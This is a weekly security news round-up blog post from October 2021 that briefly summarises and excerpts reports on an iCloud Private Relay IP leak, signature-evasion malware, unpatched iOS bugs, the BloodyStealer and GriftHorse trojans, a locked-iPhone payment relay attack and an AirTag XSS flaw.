Security news weekly round-up - 1st October 2021

Habdul Hazeez - Oct 1 '21 - - Dev Community

Introduction

Hello, welcome to this week's review. As usual, I am Habdul Hazeez.

A malware which can steal your money is not something you'll want to hear and neither is a software bug in your favorite device. Quite frankly, these among others is what this week's review is all about.

Grab a cup of coffee, and let's dissect the stories together.


Apple's New iCloud Private Relay Service Leaks Users' Real IP Addresses

This is somehow analogous to using a VPN which ends revealing your IP address to the visited website or application. You might not even know this until you use a website that reveals your IP address.

Excerpt from the article:

A new as-yet unpatched weakness in Apple's iCloud Private Relay feature could be circumvented to leak users' true IP addresses from iOS devices running the latest version of the operating system

Google Warns of a New Way Hackers Can Make Malware Undetectable on Windows

A big Hat Tip to one of the smartest creatures on Earth — Humans.

We are always crafty, to say the least.

Excerpt from the article:

Cybersecurity researchers have disclosed a novel technique adopted by a threat actor to deliberately evade detection with the help of malformed digital signatures of its malware payloads

Frustrated Researcher Discloses Three Unpatched iOS Vulnerabilities

Take a deep breath, exhale, how do you feel? Calm? That's nice, and please be patient.

Excerpt from the article:

"When I confronted [Apple], they apologized, assured me it happened due to a processing issue and promised to list it on the security content page of the next update. There were three releases since then and they broke their promise each time,” the researcher said

New BloodyStealer Trojan Steals Gamers' Epic Games and Steam Accounts

Due to the high-profile nature of the applications targeted by this malware, the name BloddyStealer is no exaggeration.

Excerpt from the article:

BloodyStealer is a Trojan-stealer capable of gathering and exfiltrating various types of data, for cookies, passwords, forms, banking cards from browsers, screenshots, log-in memory, and sessions from various applications

The information harvested from gaming apps, such as Bethesda, Epic Games, GOG, Origin, Steam, and VimeWorld, is exfiltrated to a remote server, from where it's likely to be monetized on darknet platforms

Beware! This Android Trojan Stole Millions of Dollars from Over 10 Million Users

Nothing is scarier than losing your hard-earned money to malicious code.

Excerpt from the article:

Zimperium zLabs dubbed the malicious trojan "GriftHorse." The money-making scheme is believed to have been under active development starting from November 2020, with victims reported across Australia, Brazil, Canada, China, France, Germany, India, Russia, Saudi Arabia, Spain, the U.K., and the U.S

Hackers could force locked iPhones to make contactless payments

When it's locked, that does not mean it's safe and secure.

Excerpt from the article:

The attack, classified as a Man-in-the-Middle (MitM) replay and relay attack, requires the iPhone to have a Visa Card set up for payment with the “Express Travel” mode turned on, and the victim to be in close vicinity to the attacker

Apple forgot to sanitize the Phone Number field for lost AirTags

At first, when I read this article's title, I thought of one thing only: XSS.

Then I read the article, and it turns out to be XSS because it's the major bug you can think of when you somehow fail to sanitize inputs from your users in an application.

Excerpt from the article:

This kind of attack doesn't need much technological know-how—the attacker simply types valid XSS into the AirTag's phone number field, then puts the AirTag in Lost mode and drops it somewhere the target is likely to find it

Support Me

Writing makes me thirsty. I'll appreciate a cup of coffee 😉.

Buy Me A Coffee

Credits

Cover photo by Debby Hudson on Unsplash.


That's it for this week, I'll see you next Friday.

. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .